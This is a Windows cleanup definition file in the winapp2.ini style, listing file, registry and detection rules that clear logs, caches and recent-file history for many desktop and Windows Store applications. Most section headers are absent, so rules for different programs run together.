RegKey1=HKCU\Software\Copernic\DesktopSearch2\Config\SearchHistory
FileKey1=%Documents%\DVDFab|*.log|RECURSE
FileKey2=%Documents%\DVDFab Passkey|*.log|RECURSE
Detect=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\inkscape.exe
FileKey1=%AppData%\InkScape|*.log|RECURSE
FileKey2=%UserProfile%|.recently-used.xbel
FileKey1=%AppData%\Anonymizer\Anonymizer Universal|*.log
FileKey1=%AppData%\GG\Profiles\*\*Cache|*|RECURSE
FileKey2=%AppData%\GG\logs|*.log
FileKey3=%AppData%\GG\Crash Reports|*|RECURSE
FileKey4=%AppData%\Gadu-Gadu 10\Profiles\*\*Cache|*|RECURSE
FileKey5=%AppData%\Gadu-Gadu 10\logs|*.log
FileKey6=%AppData%\Gadu-Gadu 10\Crash Reports|*|RECURSE
FileKey7=%AppData%\Gadu-Gadu\Profiles\*\*Cache|*|RECURSE
FileKey8=%AppData%\Gadu-Gadu\logs|*.log
FileKey9=%AppData%\Gadu-Gadu\Crash Reports|*|RECURSE
FileKey10=%AppData%\Nowe Gadu-Gadu\Profiles\*\*Cache|*|RECURSE
FileKey11=%AppData%\Nowe Gadu-Gadu\logs|*.log
FileKey12=%AppData%\Nowe Gadu-Gadu\Crash Reports|*|RECURSE
FileKey13=%LocalAppData%\GG\Profiles\*\*Cache|*|RECURSE
FileKey14=%LocalAppData%\GG\logs|*.log
FileKey15=%LocalAppData%\GG\Crash Reports|*|RECURSE
FileKey16=%LocalAppData%\Gadu-Gadu 10\Profiles\*\*Cache|*|RECURSE
FileKey17=%LocalAppData%\Gadu-Gadu 10\logs|*.log
FileKey18=%LocalAppData%\Gadu-Gadu 10\Crash Reports|*|RECURSE
FileKey19=%LocalAppData%\Gadu-Gadu\Profiles\*\*Cache|*|RECURSE
FileKey20=%LocalAppData%\Gadu-Gadu\logs|*.log
FileKey21=%LocalAppData%\Gadu-Gadu\Crash Reports|*|RECURSE
FileKey22=%LocalAppData%\Nowe Gadu-Gadu\Profiles\*\*Cache|*|RECURSE
FileKey23=%LocalAppData%\Nowe Gadu-Gadu\logs|*.log
FileKey24=%LocalAppData%\Nowe Gadu-Gadu\Crash Reports|*|RECURSE
RegKey1=HKCU\Software\Foxit Software\Foxit PhantomPDF 5.0\Recent File List
RegKey2=HKCU\Software\Foxit Software\Foxit PhantomPDF 6.0\Recent File List
RegKey3=HKCU\Software\Foxit Software\Foxit PhantomPDF 6.0\Foxit PhantomPDF Advanced Editor\Recent File List
FileKey1=%ProgramFiles%\PDFCreator|SetupLog.txt
FileKey2=%AppData%\pdfforge\Images2PDF|Print-*.log
FileKey3=%AppData%\pdfforge\Images2PDF|PrintPDF-*.log
FileKey4=%AppData%\pdfforge\Images2PDF\Tmp|*.prnt|REMOVESELF
RegKey1=HKCU\Software\PDFCreator\Program|LastsaveDirectory
FileKey1=%AppData%\PDF Architect\Thumbnails|*.*
RegKey1=HKCU\Software\PDF Architect\Recent File List
FileKey1=%AppData%\Firetrust\MailWasher\logs|*.*|RECURSE
FileKey2=%AppData%\Firetrust\MailWasher|log_*|RECURSE
FileKey3=%AppData%\Firetrust\MailWasher|regex.txt
FileKey4=%AppData%\Firetrust\MailWasher|updatesAIU.txt
ExcludeKey1=FILE|%AppData%\Firetrust\MailWasher\cache|*mwp_exw.dat;*mwp_conv.dat;*mwp_inw.dat;*mwp_pmap.dat;*MWP.db3
FileKey1=%AppData%\Samsung\Kies|UpdateLog.txt;UpdateList.txt;*.log|RECURSE
FileKey2=%AppData%\Samsung\Kies\UpdateTemp|*.*|RECURSE
FileKey3=%CommonAppData%\Samsung\Kies|ConnectionManager.log;Kiesairmessage.log
FileKey4=%AppData%\Samsung\Kies\TempFiles|*.*|RECURSE
FileKey5=%CommonAppData%\Samsung\Device Error Recovery|*.log
FileKey6=%LocalAppData%\Temp\KiesTemporary|*.dll
FileKey1=%ProgramFiles%\Connectify|install.log
FileKey2=%CommonAppData%\Connectify\logs|*.log
ExcludeKey1=%CommonAppData%\Connectify\logs|deamon.log
FileKey1=%AppData%\NCH Software\Scribe\Logs|*.*
FileKey1=%AppData%\GRETECH\GomPlayer\Log|*.*
FileKey2=%AppData%\GRETECH\GomPlayer\DCache|*.*
RegKey1=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME000
RegKey2=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME001
RegKey3=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME002
RegKey4=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME003
RegKey5=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME004
RegKey6=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME005
RegKey7=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME006
RegKey8=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME007
RegKey9=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME008
RegKey10=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME009
RegKey11=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME010
RegKey12=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME011
RegKey13=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME012
RegKey14=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME013
RegKey15=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME014
RegKey16=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME015
RegKey17=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME016
RegKey18=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME017
RegKey19=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME018
RegKey20=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME019
RegKey21=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME020
RegKey22=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME021
RegKey23=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME022
RegKey24=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME023
RegKey25=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME024
RegKey26=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME025
RegKey27=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME026
RegKey28=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME027
RegKey29=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME028
RegKey30=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME029
RegKey31=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME030
RegKey32=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME031
RegKey33=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME032
RegKey34=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME033
RegKey35=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME034
RegKey36=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME035
RegKey37=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME036
RegKey38=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME037
RegKey39=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME038
RegKey40=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME039
RegKey41=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME040
RegKey42=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME041
RegKey43=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME042
RegKey44=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME043
RegKey45=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME044
RegKey46=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME045
RegKey47=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME046
RegKey48=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME047
RegKey49=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME048
RegKey50=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIANAME049
RegKey51=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS000
RegKey52=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS001
RegKey53=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS002
RegKey54=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS003
RegKey55=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS004
RegKey56=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS005
RegKey57=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS006
RegKey58=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS007
RegKey59=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS008
RegKey60=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS009
RegKey61=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS010
RegKey62=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS011
RegKey63=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS012
RegKey64=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS013
RegKey65=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS014
RegKey66=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS015
RegKey67=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS016
RegKey68=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS017
RegKey69=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS018
RegKey70=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS019
RegKey71=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS020
RegKey72=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS021
RegKey73=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS022
RegKey74=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS023
RegKey75=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS024
RegKey76=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS025
RegKey77=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS026
RegKey78=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS027
RegKey79=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS028
RegKey80=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS029
RegKey81=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS030
RegKey82=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS031
RegKey83=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS032
RegKey84=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS033
RegKey85=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS034
RegKey86=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS035
RegKey87=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS036
RegKey88=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS037
RegKey89=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS038
RegKey90=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS039
RegKey91=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS040
RegKey92=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS041
RegKey93=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS042
RegKey94=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS043
RegKey95=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS044
RegKey96=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS045
RegKey97=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS046
RegKey98=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS047
RegKey99=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS048
RegKey100=HKCU\Software\GRETECH\GomPlayer\OPTION|_RECENTMEDIAPOS049
RegKey101=HKCU\Software\GRETECH\GomPlayer\OPTION|sRecentFolder
RegKey102=HKCU\Software\GRETECH\GomPlayer\OPTION|sRecentFile
RegKey103=HKCU\Software\GRETECH\GomPlayer\OPTION|sRecentURL
Detect=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.SkypeApp_kzf8qxf38zg5c
DetectFile=%LocalAppData%\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c
FileKey1=%LocalAppData%\Packages\Microsoft.SkypeApp_*\AC\Temp|*.*
FileKey2=%LocalAppData%\Packages\Microsoft.SkypeApp_*\AC\Microsoft\CryptnetUrlCache\Content|*.*
FileKey3=%LocalAppData%\Packages\Microsoft.SkypeApp_*\LocalState\*\logs|*.skypelog
FileKey4=%LocalAppData%\Packages\Microsoft.SkypeApp_*\TempState\Sync_*TempCache|*.*|RECURSE
FileKey5=%LocalAppData%\Packages\Microsoft.SkypeApp_*\Settings|LastModified.txt
RegKey1=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.SkypeApp_kzf8qxf38zg5c\SearchHistory
RegKey2=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.SkypeApp_kzf8qxf38zg5c\PSR\AddedContactSince
Detect=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\9E2F88E3.Twitter_wgeqdkkx372wm
DetectFile=%LocalAppData%\Packages\9E2F88E3.Twitter_wgeqdkkx372wm
FileKey1=%LocalAppData%\Packages\*Twitter_*\AC\Microsoft\CLR_v4.0\|Twitter-*.LOG|RECURSE
FileKey2=%LocalAppData%\Packages\*Twitter_*\AC\Microsoft\CryptnetUrlCache\Content|*.*
FileKey3=%LocalAppData%\Packages\*Twitter_*\AC\Microsoft\CryptnetUrlCache\MetaData|Twitter-*.*
FileKey4=%LocalAppData%\Packages\*Twitter_*\AC\Temp|*.*
FileKey5=%LocalAppData%\Packages\*Twitter_*\LocalState\CameraPicker\|*.png|RECURSE
FileKey6=%LocalAppData%\Packages\*Twitter_*\TempState|*.*|RECURSE
RegKey1=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\9E2F88E3.Twitter_wgeqdkkx372wm\SearchHistory
ExcludeKey1=FILE|%LocalAppData%\Packages\*Twitter_*\AC\Microsoft\CryptnetUrlCache\Content\|Twitter-SyncNow.db
DetectFile=%LocalAppData%\Packages\AdobeSystemsIncorporated.AdobeReader_ynb6jyjzte8ga
FileKey1=%LocalAppData%\Packages\AdobeSystemsIncorporated.AdobeReader_*\AC\INetCache|*.*
FileKey2=%LocalAppData%\Packages\AdobeSystemsIncorporated.AdobeReader_*\AC\INetCookies|*.*
FileKey3=%LocalAppData%\Packages\AdobeSystemsIncorporated.AdobeReader_*\AC\INetHistory|*.*
FileKey4=%LocalAppData%\Packages\AdobeSystemsIncorporated.AdobeReader_*\AC\Microsoft\CLR_v4.0\UsageLogs|AdobeReader*.log
FileKey5=%LocalAppData%\Packages\AdobeSystemsIncorporated.AdobeReader_*\AC\Temp|*.*
FileKey6=%LocalAppData%\Packages\AdobeSystemsIncorporated.AdobeReader_*\LocalState\*\logs|Adobe-*.log
FileKey7=%LocalAppData%\Packages\AdobeSystemsIncorporated.AdobeReader_*\TempState|*.*|RECURSE
DetectFile=%LocalAppData%\Packages\Microsoft.Bing_8wekyb3d8bbwe
FileKey1=%LocalAppData%\Packages\Microsoft.Bing_*\AC\Microsoft\CryptnetUrlCache\Content|*.*
FileKey2=%LocalAppData%\Packages\Microsoft.Bing_*\AC\Microsoft\CryptnetUrlCache\MetaData|*.*
FileKey3=%LocalAppData%\Packages\Microsoft.Bing_*\AC\INetCache|*.*|RECURSE
FileKey4=%LocalAppData%\Packages\Microsoft.Bing_*\AC\INetCookies|*.*|RECURSE
FileKey5=%LocalAppData%\Packages\Microsoft.Bing_*\AC\INetHistory|*.*|RECURSE
FileKey6=%LocalAppData%\Packages\Microsoft.Bing_*\AC\AppCache|*.*
FileKey7=%LocalAppData%\Packages\Microsoft.Bing_*\AC\Temp|*.*
FileKey8=%LocalAppData%\Packages\Microsoft.Bing_*\AC\Microsoft\Internet Explorer\DOMStore|*.*|RECURSE
FileKey9=%LocalAppData%\Packages\Microsoft.Bing_*\AC\PRICache|*_sync.dac
FileKey10=%LocalAppData%\Packages\Microsoft.Bing_*\TempState|*.*|RECURSE
DetectFile=%LocalAppData%\Packages\Microsoft.BingFinance_8wekyb3d8bbwe
FileKey1=%LocalAppData%\Packages\Microsoft.BingFinance_*\AC\Microsoft\CryptnetUrlCache\Content|*.*
FileKey2=%LocalAppData%\Packages\Microsoft.BingFinance_*\AC\Microsoft\CryptnetUrlCache\MetaData|*.*
FileKey3=%LocalAppData%\Packages\Microsoft.BingFinance_*\AC\INetCache|*.*|RECURSE
FileKey4=%LocalAppData%\Packages\Microsoft.BingFinance_*\AC\INetCookies|*.*|RECURSE
FileKey5=%LocalAppData%\Packages\Microsoft.BingFinance_*\AC\INetHistory|*.*|RECURSE
FileKey6=%LocalAppData%\Packages\Microsoft.BingFinance_*\AC\Temp|*.*
FileKey7=%LocalAppData%\Packages\Microsoft.BingFinance_*\LocalState\Cache|*.*
FileKey8=%LocalAppData%\Packages\Microsoft.BingFinance_*\LocalState\navigationHistory|*.*|RECURSE
FileKey9=%LocalAppData%\Packages\Microsoft.BingFinance_*\AC\Microsoft\Internet Explorer\DOMStore|*.*
FileKey10=%LocalAppData%\Packages\Microsoft.BingFinance_*\AC\PriAppCache|*.*
RegKey1=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.bingfinance_8wekyb3d8bbwe\Internet Explorer\DOMStorage\microsoft.bingfinance\SearchHistory
RegKey2=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.bingfinance_8wekyb3d8bbwe\Internet Explorer\DOMStorage\microsoft.bingfinance\RecentVisit
DetectFile=%LocalAppData%\Packages\Microsoft.BingMaps_8wekyb3d8bbwe
FileKey1=%LocalAppData%\Packages\Microsoft.BingMaps_*\AC\Microsoft\CryptnetUrlCache\Content|*.*
FileKey2=%LocalAppData%\Packages\Microsoft.BingMaps_*\AC\Microsoft\CryptnetUrlCache\MetaData|*.*
FileKey3=%LocalAppData%\Packages\Microsoft.BingMaps_*\AC\INetCache|*.*|RECURSE
FileKey4=%LocalAppData%\Packages\Microsoft.BingMaps_*\AC\INetCookies|*.*|RECURSE
FileKey5=%LocalAppData%\Packages\Microsoft.BingMaps_*\AC\INetHistory|*.*|RECURSE
FileKey6=%LocalAppData%\Packages\Microsoft.BingMaps_*\LocalState\Cache|*.*|RECURSE
FileKey7=%LocalAppData%\Packages\Microsoft.BingMaps_*\TempState|*.state
DetectFile=%LocalAppData%\Packages\Microsoft.BingNews_8wekyb3d8bbwe
FileKey1=%LocalAppData%\Packages\Microsoft.BingNews_*\AC\Microsoft\CryptnetUrlCache\Content|*.*
FileKey2=%LocalAppData%\Packages\Microsoft.BingNews_*\AC\Microsoft\CryptnetUrlCache\MetaData|*.*
FileKey3=%LocalAppData%\Packages\Microsoft.BingNews_*\AC\INetCache|*.*|RECURSE
FileKey4=%LocalAppData%\Packages\Microsoft.BingNews_*\AC\INetCookies|*.*|RECURSE
FileKey5=%LocalAppData%\Packages\Microsoft.BingNews_*\AC\INetHistory|*.*|RECURSE
FileKey6=%LocalAppData%\Packages\Microsoft.BingNews_*\AC\AppCache|*.*|RECURSE
FileKey7=%LocalAppData%\Packages\Microsoft.BingNews_*\AC\Temp|*.*
FileKey8=%LocalAppData%\Packages\Microsoft.BingNews_*\LocalState\Cache|*.*|RECURSE
FileKey9=%LocalAppData%\Packages\Microsoft.BingNews_*\AC\Microsoft\Internet Explorer\DOMStore|*.*|RECURSE
FileKey10=%LocalAppData%\Packages\Microsoft.BingNews_*\TempState|*.sync
FileKey11=%LocalAppData%\Packages\Microsoft.BingNews*\LocalState\appCache|*.rfc
FileKey12=%LocalAppData%\Packages\Microsoft.BingNews_*\AC\Microsoft\CLR_v4.0\UsageLogs|*.log
[Bing Sports]
DetectFile=%LocalAppData%\Packages\Microsoft.BingSports_8wekyb3d8bbwe
FileKey1=%LocalAppData%\Packages\Microsoft.BingSports_*\AC\Microsoft\CryptnetUrlCache\Content|*.*
FileKey2=%LocalAppData%\Packages\Microsoft.BingSports_*\AC\Microsoft\CryptnetUrlCache\MetaData|*.*
FileKey3=%LocalAppData%\Packages\Microsoft.BingSports_*\AC\INetCache|*.*|RECURSE
FileKey4=%LocalAppData%\Packages\Microsoft.BingSports_*\AC\INetCookies|*.*|RECURSE
FileKey5=%LocalAppData%\Packages\Microsoft.BingSports_*\AC\INetHistory|*.*|RECURSE
FileKey6=%LocalAppData%\Packages\Microsoft.BingSports_*\AC\Temp|*.*
FileKey7=%LocalAppData%\Packages\Microsoft.BingSports_*\LocalState\Cache|*.*|RECURSE
FileKey8=%LocalAppData%\Packages\Microsoft.BingSports_*\AC\Microsoft\Internet Explorer\DOMStore|*.*|RECURSE
ExcludeKey1=FILE|%LocalAppData%\Packages\Microsoft.BingSports_*\LocalState\Cache|_sessionState2.xml
DetectFile=%LocalAppData%\Packages\Microsoft.BingTravel_8wekyb3d8bbwe
FileKey1=%LocalAppData%\Packages\Microsoft.BingTravel_*\AC\Microsoft\CryptnetUrlCache\Content|*.*
FileKey2=%LocalAppData%\Packages\Microsoft.BingTravel_*\AC\Microsoft\CryptnetUrlCache\MetaData|*.*
FileKey3=%LocalAppData%\Packages\Microsoft.BingTravel_*\AC\INetCache|*.*|RECURSE
FileKey4=%LocalAppData%\Packages\Microsoft.BingTravel_*\AC\INetCookies|*.*|RECURSE
FileKey5=%LocalAppData%\Packages\Microsoft.BingTravel_*\AC\INetHistory|*.*|RECURSE
FileKey6=%LocalAppData%\Packages\Microsoft.BingTravel_*\AC\Temp|*.*
FileKey7=%LocalAppData%\Packages\Microsoft.BingTravel_*\LocalState\Cache|*.*|RECURSE
FileKey8=%LocalAppData%\Packages\Microsoft.BingTravel_*\LocalState\navigationHistory|*.*|RECURSE
FileKey9=%LocalAppData%\Packages\Microsoft.BingTravel_*\AC\Microsoft\Internet Explorer\DOMStore|*.*|RECURSE
FileKey1=%LocalAppData%\Sony\ErrorReport|*.erpt
FileKey2=%LocalAppData%\Sony\Vegas Pro\12.0|*.log
FileKey3=%AppData%\Sony|SCS_INSTALLER_1.log
FileKey4=%AppData%\Sony|*.dmp
FileKey5=%AppData%\Sony\Vegas Pro\12.0|localstorage_*.tmp
FileKey6=%AppData%\Sony\Vegas Pro\12.0|_lastsession.log
FileKey1=%AppData%\GPSoftware\Directory Opus\Logs|*.*
FileKey2=%LocalAppData%\GPSoftware\Directory Opus\State Data\MRU|find_name.osd
FileKey3=%LocalAppData%\GPSoftware\Directory Opus\State Data\MRU|find_path.osd
FileKey4=%LocalAppData%\GPSoftware\Directory Opus\State Data\MRU|zippy.osd
FileKey5=%AppData%\GPSoftware\Directory Opus\Thumbnail Cache|*_do.cache
RegKey1=HKLM\SOFTWARE\Wow6432Node\GPSoftware\Directory Opus\10.5.2.0|ItemListFilter
FileKey1=%SystemDrive%\NVIDIA|*.*|REMOVESELF
FileKey2=%SystemDrive%\NV|*.*|REMOVESELF
FileKey1=%ProgramData%\Canneverbe Limited\CDBurnerXP\*.*.*.*|OperationLog.log
FileKey2=%AppData%\Canneverbe Limited\CDBurnerXP|StarBurn.log
FileKey3=%AppData%\Canneverbe Limited\CDBurnerXP\*.*.*.*|*.tmp
RegKey1=HKCU\Software\Canneverbe Limited\CDBurnerXP\PathsPrev
FileKey1=%AppData%\IDMComp\UltraEdit|projects.lst
FileKey2=%AppData%\IDMComp\Common\FTP Accounts|IdmFTPAccounts_bak.txt
FileKey3=%LocalAppData%\Downloaded Installations\UltraEdit\*|UltraEdit_.msi
FileKey1=%CommonAppData%\Photodex\ProShow|photodex-presenter-install.log
FileKey2=%CommonAppData%\Photodex\ProShow Producer|photodex-presenter-install.log
FileKey3=%ProgramFiles%\Photodex\ProShow Producer|install.log
FileKey1=%AppData%\SketchUp\SketchUp 2013\SketchUp|~*.tmp
RegKey1=HKCU\Software\SketchUp\SketchUp 2013\Recent File List
Detect3=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Handbrake.exe
FileKey1=%AppData%\HandBrake\logs|*.txt
FileKey2=%AppData%\HandBrake\HandBrake\*|*.tmp
RegKey1=HKCU\Software\ABBYY\FineReader\11.00\Shell\MainFrame\RecentFileList
RegKey2=HKCU\Software\ABBYY\FineReader\11.00\Shell\Dialogs|LoadImagePath
RegKey3=HKCU\Software\ABBYY\FineReader\11.00\Shell\Dialogs|SaveImagePath
FileKey1=%ProgramFiles%\ABBYY FineReader 11|ABBYY FineReader 11.log
FileKey2=%ProgramData%\ABBYY\Bonus.ScreenshotReader\11.00|*.thumbnail
FileKey3=%ProgramData%\ABBYY\FineReader\11.00\Licenses|ProductLicensing.log
FileKey1=%AppData%\The Bat!|TheBat_Exceptions.log
FileKey2=%AppData%\The Bat!\*|ACCOUNT_LOG.TXT
FileKey1=%commonprogramfiles%\Wondershare\Wondershare Helper Compact\log\Data|*.*|RECURSE
FileKey2=%ProgramFiles%\Wondershare\Video Converter Ultimate\Log|*.*
FileKey3=%CommonAppData%\Wondershare Video Converter Ultimate|*.dat.bak
FileKey4=%CommonAppData%\Wondershare Video Converter Ultimate\TempSiteIconDir|*.*
FileKey5=%CommonAppData%\Wondershare Video Converter Ultimate\TempThumbDir|*.*
FileKey1=%LocalAppData%\Sublime Text 3\Index|LOG.old
FileKey2=%LocalAppData%\Sublime Text 3\Index|00*.log
FileKey1=%LocalAppData%\Google\Picasa2|network.log;network_expwebsites.log
FileKey2=%LocalAppData%\Google\GBScreensaver|network.log
FileKey3=%LocalAppData%\Google\Google  Auto Backup|network.log
FileKey4=%LocalAppData%\Google\Picasa2\cache|*.*|RECURSE
FileKey5=%LocalAppData%\Google\Picasa2\temp|*.*|RECURSE
FileKey6=%LocalAppData%\Google\Picasa2\tmp|PluginRec.dat;PluginRec.dat_bak
RegKey1=HKCU\Software\Kingsoft\Office\6.0\et\RecentFiles
RegKey2=HKCU\Software\Kingsoft\Office\6.0\et\RecentFunction
RegKey3=HKCU\Software\Kingsoft\Office\6.0\wpp\RecentFiles
RegKey4=HKCU\Software\Kingsoft\Office\6.0\wps\RecentFiles
FileKey1=%AppData%\Kingsoft\*|*.bak2
FileKey2=%CommonAppData%\Kingsoft\Office6\LocalTemp|*.*
FileKey3=%LocalAppData%\Kingsoft\et\cache\http|*.*|RECURSE
FileKey4=%LocalAppData%\Kingsoft\et\cache\https|*.*|RECURSE
FileKey5=%LocalAppData%\Kingsoft\wpp\cache\http|*.*|RECURSE
FileKey6=%LocalAppData%\Kingsoft\wps\cache\http|*.*|RECURSE
FileKey7=%LocalAppData%\Kingsoft\wps\cache\https|*.*|RECURSE
FileKey8=%AppData%\Kingsoft\office6\backup|*.*
FileKey9=%AppData%\Kingsoft\office6\log\*|*.log
FileKey10=%AppData%\Kingsoft\office6\update\log|*.log
FileKey11=%AppData%\Kingsoft\office6\update\down|*.src
FileKey12=%AppData%\Kingsoft\office6\update\dump|*.dmp
FileKey13=%AppData%\Kingsoft\office6\update\log\package|*.pkg
Detect=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Facebook.Facebook_8xx8rvfyw5nnt
FileKey1=%LocalAppData%\Packages\*Facebook_*\AC\AppCache|*.*|RECURSE
FileKey2=%LocalAppData%\Packages\*Facebook_*\AC\INetCache|*.*|RECURSE
FileKey3=%LocalAppData%\Packages\*Facebook_*\AC\INetCookies|*.*|RECURSE
FileKey4=%LocalAppData%\Packages\*Facebook_*\AC\INetHistory|*.*|RECURSE
FileKey5=%LocalAppData%\Packages\*Facebook_*\AC\Microsoft\CLR_v4.0|*.log|RECURSE
FileKey6=%LocalAppData%\Packages\*Facebook_*\AC\Microsoft\CryptnetUrlCache\Content|*.*
